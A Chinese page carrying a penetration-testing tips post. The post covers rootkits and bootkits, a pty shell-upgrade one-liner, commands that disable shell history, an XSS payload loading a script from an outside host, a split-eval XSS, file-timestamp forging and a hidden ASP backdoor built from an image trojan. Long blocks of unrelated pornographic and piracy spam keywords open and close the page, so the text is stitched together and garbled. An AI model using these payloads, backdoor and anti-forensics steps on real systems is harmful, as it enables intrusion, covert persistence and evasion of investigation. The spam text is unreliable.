精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

滲透測試筆記七

安全 黑客攻防
滲透測試筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學(xué)習(xí)心得。為保證質(zhì)量,每一篇為20條左右的滲透小記。

滲透測試筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學(xué)習(xí)心得。為保證質(zhì)量,每一篇為20條左右的滲透小記。

[[108761]]

1.提權(quán)后進(jìn)入遠(yuǎn)程桌面發(fā)現(xiàn) desktop locker(桌面鎖)

解決方法:

ctrl+shift+esc 一直按會出現(xiàn)資源管理器,鼠標(biāo)結(jié)束desktop locker即可

2.3389低權(quán)限用戶提權(quán)(這個(gè)情況似乎比較少見?)的時(shí)候或者日常滲透用軟件的時(shí)候可以

subst x: D:\XXX 用命令創(chuàng)建 X盤符 
遠(yuǎn)程桌面連接器-本地資源-詳細(xì)信息 -驅(qū)動(dòng)器-勾選新增的X盤符

可以把本地驅(qū)動(dòng)器映射到遠(yuǎn)程3389服務(wù)器上的X盤,放上常用提權(quán)工具方便滲透。

3.Rootkits:

Rootkits是linux/unix獲取root權(quán)限之后使得攻擊者可以隱藏自己的蹤跡和保留root訪問權(quán)限的神器,通常攻擊者使用 rootkit的檢查系統(tǒng)查看是否有其他的用戶登錄,如果只有自己,攻擊者就開始著手清理日志中的有關(guān)信息,通過rootkit的嗅探器還可以獲得其他系統(tǒng)的用戶和密碼!

目前常用的有:t0rn /mafix/enyelkm 等等。

Rootkits通常分為:應(yīng)用級別—內(nèi)核級別—-硬件級別,早期的是rootkit主要為應(yīng)用級rootkit通過替換login、ps、ls、 netstat等系統(tǒng)工具或修改.rhosts等系統(tǒng)配置文件等實(shí)現(xiàn)隱藏后門,硬件級RootKits主要是指Bios Rootkits,能夠在系統(tǒng)加載前獲得控制權(quán),通過向磁盤中寫入文件,再由引導(dǎo)程序加載該文件重新獲得控制權(quán)也可以采用虛擬機(jī)技術(shù),使整個(gè)操作系統(tǒng)運(yùn)行在rootkit掌握之中,目前常見的rootkit是內(nèi)核級rootkit,通過直接修改內(nèi)核來添加隱藏代碼實(shí)現(xiàn)控制系統(tǒng)的功能。

最為簡單實(shí)用的應(yīng)用級別Rootkit是通過將添加過提權(quán)代碼的命令替換系統(tǒng)中原始的命令來實(shí)現(xiàn)功能的,并且一般提供清理工具刪除wtmp、 utmp、lastlog等日志文件中自己的行蹤,并且復(fù)雜點(diǎn)的rootkit還可以向攻擊者提供telnel、shell和finger等服務(wù)。

4.LKM隱藏技術(shù):

LKM就是可裝載內(nèi)核模塊(Loadable Kernel Modules)。這些模塊本來是Linux系統(tǒng)用于擴(kuò)展其功能的。

木馬最大的特性就是隱蔽性,不能輕易讓人察覺,所以隱藏木馬相關(guān)信息是關(guān)鍵的因素。對于Linux操作系統(tǒng)來說,主要有靜態(tài)隱藏和動(dòng)態(tài)隱藏兩個(gè)標(biāo)準(zhǔn)。

由于Linux本身的安全性,想利用外殼程序隱藏木馬文件和進(jìn)程不可能實(shí)現(xiàn),所以就借要通過修改Linux內(nèi)核的系統(tǒng)調(diào)用來隱藏木馬相關(guān)信息,這就是LKM技術(shù)。

5.Bootkit:Bootkit是更高級的Rootkit,該概念最早于2005年被eEye Digital公司在他們的“BootRoot”項(xiàng)目中提及。它主要利用其內(nèi)核準(zhǔn)入和開機(jī)過程的隱身技術(shù),當(dāng)在功能上并無異于Rootkit。他們的不同主要表現(xiàn)在獲取準(zhǔn)入的方式上。傳統(tǒng)的rootkit利用系統(tǒng)啟動(dòng)時(shí)提升權(quán)限。而Bootkit是被安置在外設(shè)的主引導(dǎo)扇區(qū)和駐留在整個(gè)系統(tǒng)的啟動(dòng)過程。

Bootkit的引導(dǎo)扇區(qū)代碼總是在ROM BIOS執(zhí)行后主引導(dǎo)記錄被載入前劫持系統(tǒng)啟動(dòng)程序。一旦被載入到內(nèi)存,代碼便執(zhí)行中斷指令,也就是俗稱的HOOK掛鉤。它掛接到INT 13指示后續(xù)扇區(qū)讀取其信息。這個(gè)過程完成后,Bootkit試圖改變引導(dǎo)過程的結(jié)構(gòu)和操作邏輯流程。

6.用nst的反彈后門連上nc后不能su交互,報(bào)錯(cuò)如下:

standard in must be a tty

解決方法:

python -c ’import pty; pty.spawn(“/bin/sh”)’

得到shell就可以su進(jìn)行交互了。

7.history不記錄:

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

8、自己嘗試最短的引入外部腳本的xss payload(28個(gè)字符):

<script src=http://e1v.cn/pj

9、有文章稱

<script src=//xxx.xxx/a.js></script>

也可以插入,但是實(shí)測證明,不是每個(gè)瀏覽器都支持沒有http:的插入。要有效可靠的插入,還是參考上一條的插入方法。

10、實(shí)在要短得不行的,那就分開來插吧:

<script>var a=’alert’</script>
<script>var b=’(“xss”)’</script>
<script>var c=a+b </script>
<script> eval(c) </script>

11、C類IP地址:C類數(shù)字相同的IP地址,通常是同一臺服務(wù)器或是處于同一網(wǎng)絡(luò)上的服務(wù)器。所以如果兩個(gè)網(wǎng)站IP地址前三個(gè)數(shù)字相同,如198.197.196.195和198.197.196.194,搜索引擎會認(rèn)為這兩個(gè)網(wǎng)站之間是有一定關(guān)系的,很可能在同一架服務(wù)器上。

12、URL靜態(tài)化:通過URL重寫技術(shù),將動(dòng)態(tài)URL轉(zhuǎn)化為靜態(tài)URL。在LAMP主機(jī)上,URL重寫通常是通過mod_rewrite模塊;在windows主機(jī)上,通常是通過ISAPI Rewrite或是 IIS Rewrite模塊。

13、在nmap目錄下有很多掃描腳本,可以實(shí)現(xiàn)很多智能化的功能,具體在/nmap/scripts這個(gè)目錄下:使用方法:

nmap -P0 --script= smb-check-vulns 192.168.XXX.XX

14、常用的nmap掃描類型參數(shù)主要有:

-sT TCP connect掃描

-sS TCP SYN掃描

-sF -sX -sN 通過設(shè)置一些特殊的標(biāo)記位來避開防火墻的檢測

-sP 利用ping來探測主機(jī)是否存活

-sU 探測主機(jī)開放了哪些UDP端口

-sA TCP ACK掃描

-sV 探測端口上面運(yùn)行的詳細(xì)信息

15、常用的nmap掃描選項(xiàng)有:

-O 探測主機(jī)操作系統(tǒng)

-A 比較高級的主機(jī)旗標(biāo)探測

-Pn 不利用ping命令來探測主機(jī)是否存活

-F 快速掃描模式

-p<端口范圍>

16、使用icyfox-time.exe修改文件的時(shí)間屬性:

icyfox-time.exe "e:\web\yuan.asp" e:\web\gai.asp

注意:第一個(gè)文件路徑需要用雙引號,第二個(gè)不需要。這樣就把”e:\web\gai.asp”這個(gè)文件的時(shí)間改為和”e:\web\yuan.asp”文件一樣啦。

17、更加隱蔽的asp網(wǎng)站留后門的方法:

上傳一只一句話圖片馬,具體制作方法請參見“圖種技術(shù)”;然后在你要插入一句話的頁面里插入一下代碼語句:

<!--#include file="圖片馬路徑"-->

18、關(guān)于上傳漏洞的檢測步驟:

(1).上傳文件是否有格式限制,是否可以上傳exe文件;

(2).上傳文件是否有大小限制,上傳太大的文件是否導(dǎo)致異常錯(cuò)誤,上傳0K的文件是否會導(dǎo)致異常錯(cuò)誤,上傳并不存在的文件是否會導(dǎo)致異常錯(cuò)誤;

(3).通過修改擴(kuò)展名的方式是否可以繞過格式限制,是否可以通過壓包方式繞過格式限制;

(4).是否有上傳空間的限制,是否可以超過空間所限制的大小,如將超過空間的大文件拆分上傳是否會出現(xiàn)異常錯(cuò)誤。

(5).上傳文件大小大于本地剩余空間大小,是否會出現(xiàn)異常錯(cuò)誤。

(6).關(guān)于上傳是否成功的判斷。上傳過程中,中斷。程序是否判斷上傳是否成功。

(7).對于文件名中帶有中文字符,特殊字符等的文件上傳。

19、跨站請求偽造(CSRF)

(1).同個(gè)瀏覽器打開兩個(gè)頁面,一個(gè)頁面權(quán)限失效后,另一個(gè)頁面是否可操作成功。

(2).當(dāng)頁面沒有驗(yàn)證碼時(shí),查看頁面源代碼,查是是否有token。如果頁面完全是展示頁面,是不會有token的。

責(zé)任編輯:藍(lán)雨淚 來源: 網(wǎng)絡(luò)安全攻防實(shí)驗(yàn)室
相關(guān)推薦

2013-11-28 13:03:17

2013-11-28 11:29:39

2013-12-30 13:11:03

2013-11-28 10:32:10

2013-12-10 09:51:18

2013-12-24 13:15:59

2014-04-03 09:35:28

2014-11-21 10:32:33

2009-01-08 21:25:51

程序員筆記

2014-05-16 10:55:47

Spark

2023-07-06 14:07:30

2010-08-03 22:09:16

2013-11-06 16:38:59

2021-07-15 10:46:21

滲透測試網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2016-09-09 01:14:17

2017-07-24 17:00:49

2010-09-13 11:05:08

2010-09-09 21:10:22

2016-10-10 22:11:02

2013-05-27 13:37:06

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

欧美日韩一卡二卡三卡 | 国产黄色小视频网站| 天天综合网站| 亚洲欧美日韩国产中文在线| 国产精品二区三区四区| 亚洲欧美综合另类| 久久久久久久久久久妇女| 亚洲第一精品久久忘忧草社区| 国产一区亚洲二区三区| a毛片在线看免费观看| 波多野结衣中文一区| 国产精品美女在线观看| 欧美激情精品久久| 欧美亚洲高清| 亚洲成**性毛茸茸| av污在线观看| 蜜桃av.网站在线观看| 国产精品麻豆久久久| 国产精品区免费视频| 中文字幕av免费观看| 亚洲黄色免费| 色777狠狠综合秋免鲁丝| 久久久久久久无码| 国产一区二区三区精品在线观看| 色悠久久久久综合欧美99| 免费国产成人看片在线| 欧美视频综合| 成人教育av在线| 91精品久久久久久久久| caoporn国产| 在线观看日韩av电影| 久久天天躁狠狠躁夜夜躁2014| 亚洲天堂久久新| 国产成人aa在线观看网站站| 欧美裸体bbwbbwbbw| 免费日韩视频在线观看| 国内高清免费在线视频| 亚洲欧美国产77777| 亚洲精品一区二区三区四区五区 | 日本熟妇乱子伦xxxx| 午夜av一区| 中文字幕综合在线| 欧美大波大乳巨大乳| 久久91在线| 欧美一级艳片视频免费观看| 亚洲 激情 在线| 三级成人在线| 欧美性色xo影院| 国模吧无码一区二区三区| 羞羞视频在线免费国产| 国产精品美女久久久久久久网站| 视频一区不卡| 国产高清一区在线观看| 久久日韩粉嫩一区二区三区| 亚洲精品av在线播放| 欧美肥婆姓交大片| 午夜激情福利电影| 四季av一区二区凹凸精品| 国产一区二区三区在线播放免费观看 | 91成人国产精品| 美女福利视频在线| 粉嫩一区二区| 在线免费观看不卡av| 国产三级三级三级看三级| 偷拍视频一区二区三区| 在线欧美日韩国产| 亚洲无吗一区二区三区| 欧美videos粗暴| 欧美精品tushy高清| 日韩成人精品视频在线观看| 精品一区二区三区中文字幕| 欧美va日韩va| av网站有哪些| 竹菊久久久久久久| 最新国产精品拍自在线播放| 久草手机视频在线观看| 欧美91视频| 国内自拍欧美激情| 久久黄色精品视频| 蜜臀av一区二区| 96pao国产成视频永久免费| 亚洲成熟女性毛茸茸| av资源网一区| 亚洲精品在线电影| 国产精品区二区三区日本| 香蕉视频成人在线| 久久久99免费| 亚洲一区在线免费| 免费在线国产视频| 精品高清一区二区三区| 韩国视频一区二区三区| 91精品国产色综合久久不卡粉嫩| 日韩欧美中文一区| 久久久久久久久免费看无码 | 欧美成人在线直播| 中文字幕一区二区久久人妻网站| 国内精品久久久久久久影视简单| 久久视频在线看| 精品成人久久久| 老司机一区二区| 国模一区二区三区私拍视频| 中文字幕日本在线观看| 一区二区三区不卡在线观看| 国产精品免费观看久久| 国产精品视频一区二区三区综合 | 欧美韩国一区| 国产91在线播放九色快色| 国产精品久久久久久免费 | 国产精品20p| 一区二区三区在线电影| 欧美做受高潮1| 国产精品视频第一页| 久久无码av三级| 国产精品久久成人免费观看| a欧美人片人妖| 999国产精品| 91精品久久久久久久久99蜜臂| 污污内射在线观看一区二区少妇| 日韩国产欧美一区二区| 91精品成人久久| 国产精品乱码一区二区| 国产视频一区在线播放| 奇米影视亚洲色图| 国产精品中文| 色噜噜亚洲精品中文字幕| xxxx.国产| 成人午夜短视频| 一区二区av| 韩国精品主播一区二区在线观看| 日韩欧美精品在线| 欧美视频www| 精品一区免费av| 日韩精品久久久免费观看 | 亚洲黄色av一区| 亚洲欧美日韩一级| 精品一区二区三区在线| 欧美在线观看日本一区| 天天操天天插天天射| 亚洲精品视频观看| 91精品999| 围产精品久久久久久久| 国产精品丝袜视频| 成年人在线观看| 在线视频综合导航| 国产精品扒开腿做爽爽| 西西人体一区二区| 久久伦理网站| 欧美香蕉视频| 欧美日韩四区| 欧美精品一区二区三区蜜臀| 欧美国产日韩综合| 国产成人久久精品77777最新版本| 在线播放 亚洲| 99视频有精品高清视频| 久久精品久久久久久| 国产精品视频一二区| 亚洲三级免费观看| 日本人dh亚洲人ⅹxx| 欧美女激情福利| 国产精品裸体一区二区三区| 久久免费电影| 日韩不卡中文字幕| 99久热在线精品996热是什么| 91美女片黄在线观看| 青青视频在线播放| 精品视频97| 国产日韩精品在线播放| 搞黄网站在线观看| 精品国一区二区三区| 国产精品第108页| 91偷拍与自偷拍精品| 情侣黄网站免费看| 日本午夜一区| 成人久久18免费网站图片| 少女频道在线观看高清| 亚洲成色777777在线观看影院| 精品美女久久久久| 日本一区二区三区在线观看| 天天综合成人网| 国产精品99一区二区| 久久精品日韩精品| 色综合.com| 国内精品美女av在线播放| 欧美男男激情freegay| 欧美日韩成人在线一区| 久久免费播放视频| 久久久久久久久久久久久女国产乱 | 日本一区二区视频在线播放| 一区二区三区福利| 午夜一区二区三视频在线观看| 精品女同一区二区三区在线观看| 欧美成人免费网| 天堂资源中文在线| 欧美日韩成人综合在线一区二区| 欧美激情一区二区视频| 久久亚洲捆绑美女| 91亚洲一区二区| 亚洲欧美视频| 日本一区二区免费高清视频| www.亚洲一二| 国产精品久久中文| 日本一级理论片在线大全| 亚洲精品一区中文| 国产精品久久影视| 色婷婷综合久久久久中文| 国产喷水在线观看| 91视频你懂的| 中文字幕亚洲影院| 日韩国产在线观看一区| av在线com| 欧美岛国激情| 久中文字幕一区| 亚洲不卡在线| 国产欧美日韩精品专区| 91福利区在线观看| 九色成人免费视频| eeuss影院www在线播放| 亚洲美女中文字幕| 亚洲经典一区二区三区| 欧美精品v国产精品v日韩精品| 精品成人av一区二区在线播放| 亚洲免费av在线| 久久视频精品在线观看| hitomi一区二区三区精品| 久久艹这里只有精品| 男人的天堂亚洲一区| 久久久噜噜噜www成人网| 午夜精品999| 丰满女人性猛交| 欧美理论视频| 欧洲久久久久久| 欧美绝顶高潮抽搐喷水合集| caoporn国产精品免费公开| 免费高清一区二区三区| 麻豆一区一区三区四区| 成人在线观看91| 精品国产一区二| 国产日韩中文字幕在线| 国产成人毛片| 国产精品成人品| 欧美精品高清| 日av在线播放中文不卡| 色是在线视频| 欧美一级电影久久| 极品视频在线| 97免费在线视频| 国产美女一区视频| 久久久久日韩精品久久久男男| 影音先锋中文在线视频| 自拍偷拍亚洲在线| 亚洲成人影院麻豆| 视频直播国产精品| 永久免费av片在线观看全网站| 中日韩美女免费视频网址在线观看| 亚洲av片在线观看| 精品视频—区二区三区免费| 日韩精品福利| 亚洲美女又黄又爽在线观看| 国模精品一区二区| 伊人久久久久久久久久| 嫩草在线视频| 久久天天躁狠狠躁夜夜躁| av色综合久久天堂av色综合在| 久久香蕉国产线看观看av| 99在线视频观看| 欧美黑人性视频| 日韩影院在线| 国产精品国产三级国产aⅴ9色| 欧美不卡高清一区二区三区| 国产精品嫩草视频| 国产麻豆精品| 国产一区免费观看| 欧美人与拘性视交免费看| 亚洲精品无人区| 欧美三区不卡| 阿v天堂2017| 热久久免费视频| 国产精品探花在线播放| 成年人国产精品| 在线免费观看视频| 亚洲精品乱码久久久久久久久 | 青梅竹马是消防员在线| 国产性猛交xxxx免费看久久| www.久久久久.com| 欧美日韩在线综合| 成年人午夜视频在线观看| 亚洲精品激情| 久久99999| 成熟亚洲日本毛茸茸凸凹| 中文字幕一区二区三区人妻| 中文字幕中文在线不卡住| 18精品爽视频在线观看| 日韩欧美一区视频| 99热这里只有精品在线观看| 精品国产乱码久久久久久图片| 青青草在线视频免费观看| y97精品国产97久久久久久| 爱福利在线视频| 国产精品第一视频| 亚洲一区二区三区日本久久九| 免费99视频| 欧美777四色影| 欧美伦理视频在线观看| 成人精品鲁一区一区二区| 少妇愉情理伦三级| 午夜精彩视频在线观看不卡| 亚洲中文一区二区三区| 亚洲精品videossex少妇| 精品国产99久久久久久| 4438全国亚洲精品在线观看视频| 粉嫩av国产一区二区三区| 欧美日韩综合网| 亚洲一本视频| 想看黄色一级片| 久久精品人人做人人综合 | 成年人看片网站| 国产精品色在线观看| 亚洲GV成人无码久久精品| 日韩欧美在线不卡| 日日夜夜精品一区| 欧洲精品毛片网站| 国产伦精品一区二区三区在线播放| 性欧美18一19内谢| 日韩高清电影一区| 中文字幕丰满孑伦无码专区| 亚洲综合一区在线| 国产绿帽刺激高潮对白| 中文日韩电影网站| 国产精品av一区二区三区 | 天堂av在线资源| 欧美激情网友自拍| 欧美日本三级| 性欧美18一19内谢| 久久国产精品一区二区| 娇妻被老王脔到高潮失禁视频| 精品日本高清在线播放| 秋霞网一区二区| 欧美激情18p| 136导航精品福利| 大地资源网在线观看免费官网| 美女任你摸久久| 欧美国产日韩一区| 桃花岛成人影院| 欧美久久电影| 亚洲综合日本| 国产色视频一区二区三区qq号| 精品久久中文字幕| 亚洲av成人无码网天堂| 2020国产精品视频| 亚洲黄色录像| 成人黄色一区二区| 国产日韩影视精品| 在线免费观看一区二区| 色婷婷av一区二区三区在线观看| 成人18视频在线观看| 日本在线播放不卡| 免费观看日韩av| 少妇的滋味中文字幕bd| 欧美乱妇一区二区三区不卡视频| 日本黄色片在线观看| 成人写真视频福利网| 欧美日韩国产色综合一二三四| 欧美久久久久久久久久久| 欧美日韩另类字幕中文| 国产天堂在线| 国产在线观看精品一区二区三区| 999久久久亚洲| 久久久久久国产精品日本| 亚洲国产精品久久久久婷婷884| 人妻偷人精品一区二区三区| 4k岛国日韩精品**专区| 成人三级视频| 日韩欧美中文在线视频| 亚洲国产另类av| 久久天堂电影| 91久久精品一区| 极品中文字幕一区| 国产精品天天干| 日韩一区二区电影| 华人av在线| 一本久久a久久精品vr综合 | 亚洲最大av在线| 亚洲AV无码成人精品区东京热 | 亚洲 欧美 中文字幕| 一区二区中文字幕| 亚洲国产欧美在线观看| 国产肥臀一区二区福利视频| 国产精品久久久久毛片软件| www.xxxx国产| 国产97在线|亚洲| 婷婷综合亚洲| 我和岳m愉情xxxⅹ视频| 在线不卡a资源高清| 国产精品电影| gogogo免费高清日本写真| 91日韩精品一区| 92久久精品一区二区| 26uuu国产精品视频| 91精品1区| 中文字幕国产综合|